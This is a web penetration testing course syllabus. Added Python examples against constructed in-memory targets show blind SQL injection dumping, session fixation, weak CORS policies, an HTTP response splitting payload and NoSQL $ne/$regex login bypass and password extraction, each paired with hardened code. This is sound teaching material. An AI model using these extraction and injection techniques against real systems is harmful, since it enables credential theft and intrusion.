Advanced Web Application Penetration Testing
I. Overview:
The Web Application Penetration Testing course is an advanced training course that provides all the skills necessary to carry out a thorough and professional penetration test against modern web applications.
II. Duration:
39 hours
III. Objectives:
- Start from the very basics, all the way to advanced post-exploitation activities.
- Wide coverage of OWASP’s TOP 10
- Master Burp Suite
- In-depth Web application analysis, information gathering and enumeration
- XSS & SQL Injection
- Session related vulnerabilities
- LFI/RFI
- HTML5 attacks
- Pentesting Content Management Systems (CMS)
- Pentesting NoSQL databases and NoSQL-related APIs / NoSQL injections
- Move from web application attacks to network and infrastructure penetration testing
- Gives you access to dedicated forums
- Makes you a proficient professional web application pentester
- Obtaining the eWPTv1 certification qualifies you for 40 CPE credits
IV. Intended Audience:
- Penetration Testers
- Web developers
- IT admins and staff
V. Prerequisites:
- Should have attended the Basic Penetration Testing course
- Basic understanding of HTML, HTTP and JavaScript.
- Reading and understanding PHP code will help although it is not mandatory.
- No web development skills required.
VI. Course outlines:
1. Introduction to web applications
During this introductory module, the student will learn and understand the basics of web applications.
At the end of the module, the student will become familiar with tools such as Burp Suite and OWASP ZAP.
1.1. HTTP/S Protocol Basics
1.2. Encoding
1.3. Same Origin
1.4. Cookies
1.5. Sessions
1.6. Web Application Proxies
- Burp Suite
- OWASP ZAP
2. Information gathering
Every penetration test begins with the Information Gathering phase. This is where a pentester understands the application from a functional point of view and collects useful information for the following phases of the engagement. A multitude of techniques will be used to collect behavioral, functional, applicative, and infrastructural information.
The students will use a variety of tools to retrieve readily-available information from the target.
2.1. Gathering information on your target
2.2. Infrastructure
- Fingerprinting the web server
- Netcat
- WhatWeb
- Wappalyzer
- Web server modules
- Enumerating subdomains
- Netcraft
- Subbrute
- Dnsrecon
- TheHarvester
- Zone transfer
- Finding virtual hosts
2.3. Fingerprinting frameworks and applications
2.4. Fingerprinting custom applications
- Burp target crawler
- Creating a functional graph
- Mapping the attack surface
- Client side validation
- Database interaction
- File uploading and downloading
- Display of user-supplied data
- Redirections
- Access control and login-protected pages
- Error messages
- Charting
2.5. Enumerating resources
- Crawling the website
- Finding hidden files
- Back up and source code
- Enumerating user accounts
- Map
2.6. Relevant information through misconfigurations
- Directory listing
- Log and configuration files
- HTTP verbs and file upload
2.7. Google hacking
3. Cross-Site Scripting
In this module, the most widespread web application vulnerability will be dissected and studied in depth. At first, you are provided with a theoretical explanation; this understanding will help you in the exploitation and remediation process. Later, you will have the opportunity to master all the techniques to find XSS vulnerabilities through black box testing.
3.1. Cross-Site Scripting Basics
3.2. Anatomy of an XSS Exploitation
3.3. The three types of XSS
a. Reflected XSS
b. Persistent XSS
c. DOM-based XSS
3.4. Finding XSS
Finding XSS in PHP code
3.5. XSS Exploitation
a. XSS and Browsers
b. XSS Attacks
- Cookie Stealing through XSS
- Defacement
- XSS for advanced phishing attacks
- BeEF
3.6. Mitigation
- Input validation
- Context-aware output encoding
- Never trust user input
4. SQL injection
This module covers finding and exploiting SQL injections, from the most basic SQL injection up to the most advanced techniques.
You will not just be able to dump remote databases but also execute commands on the database server and take over the host through advanced SQL injection techniques.
4.1. Introduction to SQL Injections
a. SQL Statements
b. SQL Queries inside web applications
c. Vulnerable dynamic queries
d. How dangerous is a SQL Injection
e. SQLi attacks classification
4.2. Finding SQL Injections
a. Simple SQL Injection scenario
b. SQL errors in web applications
c. Boolean-based detection
4.3. Exploiting In-band SQL Injections
a. First scenario
b. In-band attack challenges
c. Enumerating the number of fields in a query
- Different DBMS UNION mismatch errors
d. Blind enumeration
e. Identifying field types
f. Dumping the database content
4.4. Exploiting Error-based SQL Injections
a. MS SQL Server Error-based exploitation
b. The CAST Technique
c. Finding the DBMS version
d. Dumping the database data
e. Video – Error-based SQLi
f. MySQL Error-based SQLi
g. PostgreSQL Error-based SQLi
h. Developing Error-based SQLi Payloads
4.5. Exploiting blind SQLi
a. String extraction
b. Detecting the current user
c. Scripting blind SQLi data dump
d. Exploiting blind SQLi
e. Optimize blind SQLi
f. Time-based blind SQLi
4.6. SQLMap
a. Basic syntax
b. Extracting the database banner
c. Information Gathering
d. Extracting the Database
e. Extracting the Schema
f. Video – SQL Injection
g. Video – SQLMap
h. SQLMap Advanced Usage
i. Conclusions
4.7. Mitigation Strategies
a. Prepared statements
- Implementation
b. Type casting
c. Input validation
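The following is an added example (not code from the course or the original page) that ties module 4.5 (blind SQLi: string extraction, scripting the dump, optimizing the number of requests) to module 4.7 (prepared statements and type casting). The target is a constructed SQLite database and a hypothetical endpoint named `vulnerable_profile_exists` that only reveals whether a row matched; every function, table and value in it is an assumption made for the example. SQLite's `unicode(substr(...))` plays the role of MySQL's `ASCII(SUBSTRING(...))`.

```python
import sqlite3

# Constructed stand-in for the target's database (not a real application).
_db = sqlite3.connect(":memory:", check_same_thread=False)
_db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
_db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                [("admin", "s3cr3t!"), ("alice", "wonderland")])
_db.commit()

REQUESTS = {"count": 0}  # counts oracle calls so the optimisation is visible


def vulnerable_profile_exists(user_id):
    """Hypothetical vulnerable endpoint: user input is concatenated into the
    query and the response only reveals whether a row matched (a boolean oracle)."""
    REQUESTS["count"] += 1
    sql = f"SELECT username FROM users WHERE id = {user_id}"
    try:
        return _db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # the application would show a generic error page


def safe_profile_exists(user_id):
    """Hardened form (module 4.7): type-cast the input, then bind it as a
    parameter so it can never be parsed as SQL."""
    try:
        uid = int(user_id)
    except ValueError:
        return False
    row = _db.execute("SELECT username FROM users WHERE id = ?", (uid,)).fetchone()
    return row is not None


def oracle(condition):
    """Turns the endpoint into a yes/no oracle for an arbitrary SQL condition."""
    return vulnerable_profile_exists(f"1 AND ({condition})")


def extract_string(expr, max_len=64):
    """Blind extraction of the value of an SQL expression (a scalar subquery).
    Binary search over printable ASCII (32-126) needs at most 7 requests per
    character instead of up to 95 for a linear scan; the length is found the
    same way. Assumes the value is printable ASCII."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"length(({expr})) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    length = lo

    chars = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


def dump_admin_password():
    """Returns the extracted admin password and the number of requests used."""
    REQUESTS["count"] = 0
    value = extract_string("SELECT password FROM users WHERE username = 'admin'")
    return value, REQUESTS["count"]
```

With a 7-character secret the dump above costs at most 56 requests (7 for the length plus 7 per character); a linear scan of the same range could cost over 600. The hardened function rejects `1 OR 1=1` outright because the cast fails before any SQL is built.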
4.8. From SQLi to Server Takeover
a. Advanced MS SQL Server Exploitation
- xp_cmdshell
- Internal Network Host Enumeration
- Port Scanning
- Reading the File System
- Uploading Files
- Storing Command Results into a Temporary Table
b. Advanced MySQL Exploitation
- Reading the File System
- Uploading Files
- Executing Shell Commands
c. Conclusions
5. Authentication and authorization
In this module, the student will learn the most common authentication mechanisms, their weaknesses and the related attacks: from inadequate password policies to weaknesses in the implementation of common features.
5.1. Introduction
a. Authentication vs. Authorization
b. Authentication factors
- Single-factor authentication
- Two-factor authentication
5.2. Common Vulnerabilities
a. Credentials over an unencrypted channel
b. Inadequate password policy
- Dictionary attacks
- Brute force attacks
- Defending from inadequate password policy
- · Strong password policy
- · Storing hashes
- · Lockout/Blocking requests
c. User enumeration
- Via error messages
- Via website behavior
- Via timing attacks
- Taking advantage of user enumeration
d. Default or easily-guessable user accounts
e. The remember me functionality
- Browser cache method
- Cookie method
- Web storage method
- Best defensive techniques
f. Password reset feature
- Easily guessable answers
- Unlimited attempts
- Password reset link
g. Logout weaknesses
- Incorrect session destruction
h. CAPTCHA
5.3. Bypassing Authorization
a. Insecure direct object references
- Best defensive techniques
b. Missing function level access control
c. Parameter modification
- Vulnerable web application
d. Incorrect redirection
- Redirect to protected contents
- Best defensive techniques
e. SessionID prediction
f. SQL Injections
g. Local file inclusion and path traversal
6. Session security
Session-related vulnerabilities, along with extensive coverage of the most common attacking patterns are the subject of this module.
Code samples on how to prevent session attacks are provided in PHP, Java and .NET. At the end of the module, the student will master offensive as well as defensive procedures related to session management within web applications.
6.1. Weaknesses of the session identifier
6.2. Session hijacking
a. Session Hijacking via XSS
- Exploit session hijacking via XSS
- Preventing session hijacking via XSS
- · PHP
- · Java
- · .NET
b. Session Hijacking via Packet Sniffing
c. Session Hijacking via access to the web server
6.3. Session Fixation
a. Attacks
- Set the SessionID
- Force the victim
- Vulnerable web application
b. Preventing Session Fixation
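The following is an added example (not code from the course or the original page) that plays out the session fixation attack of module 6.3 against a constructed in-memory session store: the attacker picks an id, the id is forced on the victim, the victim logs in, and the attacker reuses the id. The same store run with `regenerate_on_login=True` shows the prevention step (issue a fresh id at authentication). The class, the credentials and the id value are assumptions made for the example.

```python
import secrets

VALID_CREDENTIALS = {"victim": "correct horse battery staple"}  # constructed


class SessionStore:
    """Minimal stand-in for a framework session handler."""

    def __init__(self, regenerate_on_login):
        self.sessions = {}  # session id -> attributes
        self.regenerate_on_login = regenerate_on_login

    def ensure_session(self, presented_sid=None):
        if presented_sid is None:
            presented_sid = secrets.token_urlsafe(32)
        if presented_sid not in self.sessions:
            # Accepting an unknown, client-supplied id is the first weakness
            # (PHP with session.use_strict_mode=0 behaves this way): the
            # attacker's chosen id becomes a valid server-side session.
            self.sessions[presented_sid] = {"user": None}
        return presented_sid

    def login(self, sid, username, password):
        sid = self.ensure_session(sid)
        if VALID_CREDENTIALS.get(username) != password:
            return sid, False
        if self.regenerate_on_login:
            # Prevention: discard the pre-authentication id and issue a new one
            # (session_regenerate_id(true) in PHP, changeSessionId() in Java).
            del self.sessions[sid]
            sid = secrets.token_urlsafe(32)
            self.sessions[sid] = {"user": None}
        self.sessions[sid]["user"] = username
        return sid, True

    def whoami(self, sid):
        return self.sessions.get(sid, {}).get("user")


def run_fixation_attack(regenerate_on_login):
    """Returns what the attacker sees after the victim authenticates and
    whether the victim's session id changed at login."""
    app = SessionStore(regenerate_on_login)
    attacker_sid = "ATTACKER-CHOSEN-ID"           # 6.3.a "Set the SessionID"
    app.ensure_session(attacker_sid)                # id is now valid server-side
    # 6.3.a "Force the victim": the victim arrives carrying the attacker's id
    # (via a crafted link, cookie injection or a subdomain-set cookie).
    victim_sid, ok = app.login(attacker_sid, "victim", VALID_CREDENTIALS["victim"])
    if not ok:
        raise RuntimeError("victim login should succeed")
    return {"attacker_sees": app.whoami(attacker_sid),
            "victim_sid_changed": victim_sid != attacker_sid}
```

Regenerating the id is the essential fix; rejecting unknown ids (strict mode) and binding the session to a login timestamp are complementary.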
6.4. Cross-Site Request Forgeries
a. Finding CSRF
b. Exploiting CSRF
c. Preventing CSRF
7. Flash security and attacks
Flash, although end-of-life (Adobe ended support on December 31, 2020), is still present on many legacy websites. Flash files can expose a web application and its users to a number of security risks, which are covered in this module. The student will first study the Flash security model and its pitfalls, and move on to using the most recent tools to find and exploit vulnerabilities in Flash files. After having studied this module, students will never look at SWF files the same way.
7.1. Introduction
a. ActionScript
- Compiling and decompiling
b. Embedding Flash in HTML
- The allowScriptAccess attribute
c. Passing arguments to Flash files
- Direct reference
- Flash embedded in HTML
- FlashVars attribute
7.2. Flash Security Model
a. Sandboxes
b. Stakeholders
- Administrative role
- User role
- Website role
- URL policy file
- Author role
c. Calling JavaScript from ActionScript
d. Calling ActionScript from JavaScript
e. The navigateToURL method
f. Local shared object
7.3. Flash Vulnerabilities
a. Flash parameter injection
b. Fuzzing Flash with SWFInvestigator
c. Finding hardcoded sensitive information
7.4. Pentesting Flash Applications
a. Analyzing client-side components
b. Identifying communication protocol
c. Analyzing server-side components
8. HTML5
This module provides in-depth coverage of the attack vectors and weaknesses introduced by the new W3C standards and protocols, both drafted and finalized.
We will go through the most important elements of HTML5 and especially CORS, which lets a server selectively relax the Same Origin Policy for cross-origin requests and therefore changes how the SOP applies to most modern web applications. By mastering this module in theory and practice, the student will possess an arsenal of penetration testing techniques still unknown to many penetration testers.
A number of Hera labs are available to practice the topics covered in this module. This module will also bring a penetration tester's skills to the next level with next-generation attack vectors that will affect web applications for years to come.
8.1. Cross-Origin Resource Sharing
a. Same Origin Policy issues
b. Cross-Domain Policy in Flash
c. Cross-Origin Resource Sharing
- Cross-Origin Ajax requests
- Requests
- · Simple request
- · Preflighted request
- · Request with credentials
- Access Control Headers
- · Access-Control-Allow-Origin
- · Access-Control-Allow-Credentials
- · Access-Control-Allow-Headers
- · Access-Control-Allow-Methods
- · Access-Control-Max-Age
- · Access-Control-Expose-Headers
- · Origin (request header)
- · Access-Control-Request-Method
- · Access-Control-Request-Headers
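The following is an added example (not code from the course or the original page) that shows, for the CORS headers listed in module 8.1, two weak server-side policies beside a hardened one, plus the check a tester applies to a response. Requests and responses are plain dictionaries; the allowlist, the origins and the function names are assumptions made for the example.

```python
# Constructed allowlist for a hypothetical API; not taken from the page.
ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}


def make_request(origin, method="GET", preflight=False):
    """Builds a minimal request (method + headers) as the browser would send it."""
    headers = {"Origin": origin}
    if preflight:
        headers["Access-Control-Request-Method"] = "POST"
        headers["Access-Control-Request-Headers"] = "content-type"
    return {"method": method, "headers": headers}


def reflecting_cors(request):
    """Weak configuration: reflect whatever Origin arrives and allow credentials.
    Any site can then read authenticated responses from this API."""
    origin = request["headers"].get("Origin")
    if origin is None:
        return {}
    return {"Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true"}


def suffix_check_cors(request):
    """Another weak variant: a suffix check on the Origin string, which also
    matches https://evilexample.com (a prefix check would match
    https://app.example.com.attacker.net instead)."""
    origin = request["headers"].get("Origin")
    if origin and origin.endswith("example.com"):
        return {"Access-Control-Allow-Origin": origin,
                "Access-Control-Allow-Credentials": "true"}
    return {}


def allowlist_cors(request):
    """Hardened: exact-match allowlist, Vary: Origin so caches do not serve one
    origin's answer to another, and a preflight answer listing only what the
    API needs."""
    headers = request["headers"]
    origin = headers.get("Origin")
    if origin is None or origin not in ALLOWED_ORIGINS:
        return {}  # no CORS headers: the browser refuses to expose the response
    out = {"Access-Control-Allow-Origin": origin,
           "Access-Control-Allow-Credentials": "true",
           "Vary": "Origin"}
    if request["method"] == "OPTIONS" and "Access-Control-Request-Method" in headers:
        out["Access-Control-Allow-Methods"] = "GET, POST"
        out["Access-Control-Allow-Headers"] = "Content-Type, Authorization"
        out["Access-Control-Max-Age"] = "600"
    return out


def is_exploitable(response_headers, attacker_origin):
    """Tester's check: with these response headers, can a page on
    attacker_origin read a cookie-authenticated response? '*' together with
    credentials is rejected by browsers, so it only exposes public data;
    'null' is reachable from a sandboxed iframe, so it counts."""
    acao = response_headers.get("Access-Control-Allow-Origin")
    creds = response_headers.get("Access-Control-Allow-Credentials", "").lower() == "true"
    if acao == "*":
        return False
    return creds and acao in (attacker_origin, "null")
```

When testing, send the `Origin` header with an attacker-controlled value, a look-alike domain and the literal `null`, and read back `Access-Control-Allow-Origin` together with `Access-Control-Allow-Credentials`.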
8.2. Cross-Window Messaging
a. Relationship between windows
b. Sending messages
c. Receiving messages
d. Security issues
- Cross-Domain XSS
8.3. Web Storage
a. Different storages
- Local storage
- Session storage
b. Local storage APIs
- Adding an item
- Retrieving an item
- Removing an item
- Removing all items
c. SessionStorage APIs
d. Security issues
- Stealing local storage via JS
8.4. WebSocket
a. Real-time applications using HTTP
b. WebSocket – the protocol (IETF RFC 6455) and its W3C/WHATWG API
- Benefits
c. WebSocket API
d. Security Issues
8.5. Sandboxed frames
a. Security issues before HTML5
- Redirection
- Accessing the parent document from iframe
b. HTML5 sandbox attribute
9. File and Resource attacks
During this module, the student will practice a number of vulnerabilities that affect web application files and resources.
The student will learn how to identify and exploit path traversal, file inclusion and unrestricted file upload vulnerabilities.
9.1. Path Traversal
a. Path conversion
b. Encoding
c. Best defensive techniques
9.2. File Inclusion Vulnerabilities
a. Local File Inclusion (LFI)
b. Remote File Inclusion (RFI)
9.3. Unrestricted File Upload
a. Vulnerable web application
- The attack
b. Best defensive techniques
- Filtering based on file content
10. Other attacks and Vulnerabilities
During this module, the student will practice a number of vulnerabilities that, despite being less known or publicized, still affect a number of web applications across many different programming languages and platforms.
Advanced clickjacking attacks are covered in depth with real-world examples and dissected real-world attacks.
The level of depth and the amount of practical sessions in this module will provide even seasoned penetration testers with new ways to break the security of their targets.
10.1. Clickjacking
a. Understanding Clickjacking
b. Feasibility study
c. Case 1: Clickjacking is possible
d. Case 2: Clickjacking is not possible
e. Building a malicious web page
f. Spreading the malicious link
g. Waiting for the victim's click
h. Best defensive techniques
- The old-school approach (frame busting)
- Using the X-Frame-Options HTTP header
i. Likejacking in Facebook
j. Cursorjacking
10.2. HTTP Response Splitting
a. Typical vulnerable scenario
b. XSS through HTTP response splitting
c. Bypassing Same Origin Policy
- Attack explained
- Best defensive techniques
- Defense in PHP
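The following is an added example (not code from the course or the original page) for module 10.2: a hypothetical redirect handler that copies a parameter into the `Location` header, a constructed payload that splits the response in two, a naive parser showing how a proxy or cache would see two messages, and the hardened handler that rejects CR/LF after decoding. The handler names and the payload are assumptions made for the example.

```python
from urllib.parse import unquote

# Constructed payload: ends the first response early, then supplies a complete
# second response carrying attacker-controlled HTML (XSS through splitting).
DEMO_PAYLOAD = ("/home\r\nContent-Length: 0\r\n\r\n"
                "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 25\r\n\r\n"
                "<script>alert(1)</script>")


def vulnerable_redirect(target):
    """Hypothetical vulnerable handler: the already URL-decoded 'target'
    parameter is copied verbatim into the Location header."""
    return (b"HTTP/1.1 302 Found\r\n"
            b"Location: " + target.encode("latin-1", "replace") + b"\r\n"
            b"Content-Length: 0\r\n\r\n")


def safe_redirect(target):
    """Hardened: decode (twice, since some stacks decode again) and refuse
    any CR or LF, then allow only local paths so the redirect cannot be
    pointed off-site either."""
    decoded = unquote(unquote(target))
    if "\r" in decoded or "\n" in decoded:
        raise ValueError("header injection attempt")
    if not decoded.startswith("/") or decoded.startswith("//"):
        raise ValueError("only local paths are allowed")
    return (b"HTTP/1.1 302 Found\r\nLocation: " + decoded.encode("ascii")
            + b"\r\nContent-Length: 0\r\n\r\n")


def is_safe_target(target):
    try:
        safe_redirect(target)
        return True
    except ValueError:
        return False


def split_responses(raw):
    """Naive message parser modelling a cache or proxy: reads a header block,
    consumes Content-Length bytes of body, and starts a new message if what
    follows looks like a status line. Returns [(status_line, headers, body)]."""
    messages = []
    while raw.startswith(b"HTTP/"):
        head, _, raw = raw.partition(b"\r\n\r\n")
        lines = head.split(b"\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(b":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get(b"content-length", b"0"))
        body, raw = raw[:length], raw[length:]
        messages.append((lines[0].decode("ascii", "replace"), headers, body))
    return messages
```

The second message is the one a shared cache may store for the requested URL, which is what turns a splitting bug into a Same Origin Policy bypass: the injected page is served from the victim's origin.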
10.3. Business Logic Flaws
a. Vulnerable web application
b. Best defensive techniques
10.4. Denial of Service
a. Different DoS attacks
- DoS due to huge number of requests
- DoS due to greedy pages
b. Best defensive techniques
11. Web Services
Professional penetration testers should master all aspects of web services testing.
Web services nowadays are the data and logic providers for a variety of thin and thick clients, from web application front ends to mobile applications.
During this highly in-depth module, the student will first become familiar with web services paradigms and protocols and then learn the most important related security issues.
WSDL and SOAP testing will be covered not only in theory but also in practice in our Hera Lab.
11.1. Introduction
11.2. Web Services Implementations
a. XML-RPC
b. JSON-RPC
c. SOAP
d. RESTful
11.3. The WSDL Language
a. Interaction between client and server
b. Objects in the WSDL
- Binding
- PortType
- Operation
- Interface
- Message
c. SOAP in action
d. Further reading
11.4. Attacks
a. WSDL Disclosure
- Google hacking
- Discovering WSDL files
- Public Web Services
b. WSDL Scanning
- Attack in action
c. SOAPAction Spoofing
- Prerequisites for the attack
- Attack in action
- Best defensive techniques
d. SQLi through SOAP messages
- Best defensive techniques
12. XPath Injection
XPath is the W3C standard query language for selecting nodes from XML documents; web applications use it to query XML-based data stores in the same way SQL is used against relational databases.
In this module, the student will learn advanced XPath injection techniques, in theory and in practice in Hera Lab.
12.1. XPath Injection
12.2. XML Documents and Databases
12.3. XPath
- XPath expression and syntax
- XPath vs. SQL
12.4. Detecting XPath Injection
a. Error-based injection
b. Blind injection
- Detect true condition
- Detect false condition
c. Exploitation
- Bypass XPath query
- Extracting the XML document structure
- Finding out the root node
- Finding the first child node name
- Finding the content of a node
12.5. Best Defensive Techniques
13. Penetration Testing Content Management Systems
This module covers the whole range of penetration testing activities against CMS, from information gathering, enumeration and brute force attacks, to host exploitation through vulnerable plugins and lateral movement through credential reuse. More specifically, the student will get accustomed to identifying vulnerabilities like XSS, SQLi, RCE, SOME (Same Origin Method Execution) and CSRF on WordPress and Joomla CMS, as well as chaining various vulnerabilities for maximum exploitation.
13.1. Introduction
13.2. WordPress
a. Information Gathering
- WPScan
- Plecost
- Nmap NSE Scripts
- Directory Indexing/Listing
b. Exploitation
- Bruteforce Attacks
- · Bruteforce with WPScan
- · Bruteforce with wpbf
- Attacking Plugins
- · From XSS to RCE
- · Malicious Plugins for Post-Exploitation & Persistence
13.3. Joomla
a. Information Gathering
- Joomscan
- Joomla Scan
- Extensions
- Content Discovery
b. Exploitation
- Bruteforce Attacks
- Vulnerabilities in Joomla Core
14. Penetration Testing NoSQL Databases
In this module, the student will learn how to manually identify and exploit vulnerabilities in NoSQL databases or NoSQL-powered web applications, as well as execute elaborate attacks against exposed NoSQL-related APIs. Transitioning from a compromised NoSQL database to full host exploitation, as well as effective data exfiltration methods are also covered in this module.
14.1. Introduction
a. Pentesting NoSQL Databases Methodology
14.2. NoSQL Fundamentals & Security
a. MongoDB
- MongoDB Fundamentals
- MongoDB Security
- MongoDB Penetration Testing Tools
b. CouchDB
- CouchDB Fundamentals
- CouchDB Security
- CouchDB Exploitation Examples
c. Elasticsearch
- Elasticsearch Fundamentals
- Elasticsearch Security
d. Memcached
- Memcached Fundamentals
- Memcached Security
- Memcached Exploitation Example
e. Redis
- Redis Fundamentals
- Redis Security
14.3. NoSQL Exploitation
a. NoSQL Injections
b. NoSQL Injection Categories
- PHP Tautology Injections
- NoSQL Union Query Injection
- NoSQL JavaScript Injection
- Piggybacked Queries
- · Real-Life Piggybacked Query Attack
- Cross-Origin Violations
- · Real-Life Cross-Origin Exploitation Against MongoDB
- NoSQL Injection in MEAN Stack Applications
- · NoSQL Injection in MEAN Stack Applications – Example 1
- · NoSQL Injection in MEAN Stack Applications – Example 2
- · NoSQL Injection in MEAN Stack Applications – Example 3
- · NoSQL Injection in MEAN Stack Applications – Example 4
- · NoSQL Injection in MEAN Stack Applications – Example 5
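The following is an added example (not code from the course or the original page) covering two of the injection categories listed above: the PHP-style tautology delivered as `username[$ne]=x` in a query string, and the MEAN-stack case where a JSON body is passed straight into a MongoDB query. MongoDB itself is replaced by a constructed in-memory collection and a matcher implementing only the `$ne`, `$gt` and `$regex` operators; the user records, the handler names and the alphabet used for extraction are assumptions made for the example. The `$regex` extraction generalises the tautology into a blind, character-by-character password dump.

```python
import re
import string
from urllib.parse import parse_qs

# Constructed stand-in for a MongoDB 'users' collection.
USERS = [
    {"username": "admin", "password": "Sup3rS3cret"},
    {"username": "alice", "password": "wonderland"},
]


def _matches(value, cond):
    """Subset of MongoDB query semantics: equality, or a dict of operators."""
    if not isinstance(cond, dict):
        return value == cond
    if value is None:
        return False
    for op, arg in cond.items():
        if op == "$ne":
            if value == arg:
                return False
        elif op == "$gt":
            if not value > arg:
                return False
        elif op == "$regex":
            if re.search(arg, value) is None:
                return False
        else:
            raise ValueError(f"unsupported operator {op}")
    return True


def find_one(query):
    for doc in USERS:
        if all(_matches(doc.get(k), v) for k, v in query.items()):
            return doc
    return None


def php_parse_qs(qs):
    """Mimics PHP's bracket syntax: username[$ne]=x -> {"username": {"$ne": "x"}}.
    This is how a tautology arrives through a plain form POST or URL."""
    out = {}
    for key, values in parse_qs(qs).items():
        m = re.fullmatch(r"(\w+)\[(\$?\w+)\]", key)
        if m:
            out.setdefault(m.group(1), {})[m.group(2)] = values[0]
        else:
            out[key] = values[0]
    return out


def vulnerable_login(body):
    """MEAN-style handler that copies req.body fields into the query, so an
    object such as {"$ne": ""} is interpreted as an operator, not a string."""
    return find_one({"username": body.get("username"),
                     "password": body.get("password")})


def safe_login(body):
    """Hardened: both fields must be plain strings (what mongo-sanitize or a
    schema validator enforces), so operators never reach the query."""
    u, p = body.get("username"), body.get("password")
    if not isinstance(u, str) or not isinstance(p, str):
        return None
    return find_one({"username": u, "password": p})


def extract_password(username, alphabet=string.ascii_letters + string.digits):
    """Blind extraction: grow a known prefix one character at a time by asking
    whether the password matches ^prefix+c. Stops when no character in the
    alphabet extends the prefix (characters outside the alphabet end it early)."""
    prefix = ""
    while True:
        for ch in alphabet:
            probe = {"username": username,
                     "password": {"$regex": "^" + re.escape(prefix + ch)}}
            if vulnerable_login(probe) is not None:
                prefix += ch
                break
        else:
            return prefix
```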
VII. LABS
The WAPT course is a practice-based curriculum. Being integrated with Hera Lab, the most sophisticated virtual lab on IT Security, it offers an unmatched practical learning experience. Hera is the only virtual lab that provides fully isolated per-student access to each of the real world network scenarios available on the platform. Students can access Hera Lab from anywhere through VPN.
- Lab 1 Introduction - 2 Challenging Labs
- Lab 2 Information Gathering - 2 Challenging Labs
- Lab 3 Cross Site Scripting - 7 Challenging Labs
- Lab 4 SQL Injection - 10 Challenging Labs
- Lab 5 Authentication and Authorization - 14 Challenging Labs
- Lab 6 Session Security - 9 Challenging Labs
- Lab 7 Flash Security - 1 Challenging Lab
- Lab 8 HTML5 - 4 Challenging Labs
- Lab 9 File and Resources Attacks - 4 Challenging Labs
- Lab 10 Other Attacks - 1 Challenging Lab
- Lab 11 Web Services - 4 Challenging Labs
- Lab 12 XPath - 5 Challenging Labs
- Lab 13 Exploiting WordPress - 5 Challenging Labs
- Lab 14 From Static Analysis to WordPress Exploitation - 1 Challenging Lab
- Lab 15 Chaining Vulnerabilities To Remotely Extract WP Admin Credentials - 1 Challenging Lab
- Lab 16 Redis Exploitation - 3 Challenging Labs
- Lab 17 NoSQL Injections Against MongoDB - 4 Challenging Labs
- Lab 18 CouchDB Exploitation - 2 Challenging Labs
VIII. Delivery:
- Online
- At Ho Chi Minh City
- At Ha Noi